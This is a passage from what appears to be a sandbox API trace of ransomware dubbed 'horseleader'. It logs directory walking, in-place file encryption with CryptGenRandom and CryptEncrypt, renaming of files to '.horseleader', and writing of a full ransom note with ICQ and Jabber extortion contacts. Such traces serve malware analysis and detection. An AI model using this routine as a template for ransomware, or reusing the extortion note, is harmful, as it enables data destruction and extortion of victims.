lpString2="_uninstalling_.png") returned 1 [0202.195] lstrlenW (lpString=".testttjffg") returned 11 [0202.195] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0202.195] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0202.196] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0202.196] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0202.196] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0202.197] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0202.197] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1988) returned 1 [0202.197] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x7c4, lpOverlapped=0x0) returned 1 [0202.713] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0202.713] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x7c4, lpOverlapped=0x0) returned 1 [0202.714] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0202.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0202.714] CloseHandle (hObject=0x21c) returned 1 [0202.714] GetProcessHeap () returned 0x780000 [0202.714] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0202.714] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0202.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0202.715] GetProcessHeap () returned 0x780000 [0202.715] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0202.715] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0202.715] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0202.715] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0202.715] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0202.723] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0202.723] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0202.724] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0202.724] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0202.724] CloseHandle (hObject=0x1cc) returned 1 [0202.725] GetProcessHeap () returned 0x780000 [0202.725] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0202.725] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0202.725] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0202.725] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 66 [0202.725] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0202.725] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0202.725] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0202.725] GetProcessHeap () returned 0x780000 [0202.725] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0202.725] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*") returned 68 [0202.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0204.371] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0204.371] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.") returned 68 [0204.371] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0204.371] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0204.371] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0204.371] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0204.371] lstrlenW (lpString=".testttjffg") returned 11 [0204.371] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0204.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0204.372] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.372] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0204.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0204.372] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..") returned 69 [0204.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0204.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0204.372] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0204.372] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0204.372] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0204.372] lstrlenW (lpString=".testttjffg") returned 11 [0204.373] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0204.373] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.373] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0204.373] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.373] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0204.373] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Windows") returned -1 [0204.373] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0204.373] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".horseleader") returned 0x0 [0204.373] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0204.374] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="_uninstalling_.png") returned 1 [0204.374] lstrlenW (lpString=".testttjffg") returned 11 [0204.374] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpSrch=".testttjffg") returned 0x0 [0204.374] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.374] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0204.374] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0204.377] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0204.378] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".txt") returned 0x0 [0204.378] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2511872) returned 1 [0204.378] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.378] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.625] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0204.625] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.626] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x130200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.626] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.633] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0204.633] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.634] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x260400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.634] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.921] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0204.921] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.921] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.921] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0204.921] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0204.922] CloseHandle (hObject=0x21c) returned 1 [0204.922] GetProcessHeap () returned 0x780000 [0204.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0204.922] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.horseleader") returned 93 [0204.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.horseleader")) returned 1 [0204.923] GetProcessHeap () returned 0x780000 [0204.923] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0204.923] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0204.923] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Windows") returned -1 [0204.923] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0204.924] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".horseleader") returned 0x0 [0204.924] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0204.924] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="_uninstalling_.png") returned 1 [0204.924] lstrlenW (lpString=".testttjffg") returned 11 [0204.924] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".testttjffg") returned 0x0 [0204.925] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.925] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0204.925] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0204.926] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0204.926] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".txt") returned 0x0 [0204.927] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1452) returned 1 [0204.927] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0205.289] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0205.290] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0205.290] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.290] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0205.291] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0205.291] CloseHandle (hObject=0x21c) returned 1 [0205.291] GetProcessHeap () returned 0x780000 [0205.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0205.455] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.horseleader") returned 93 [0205.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: 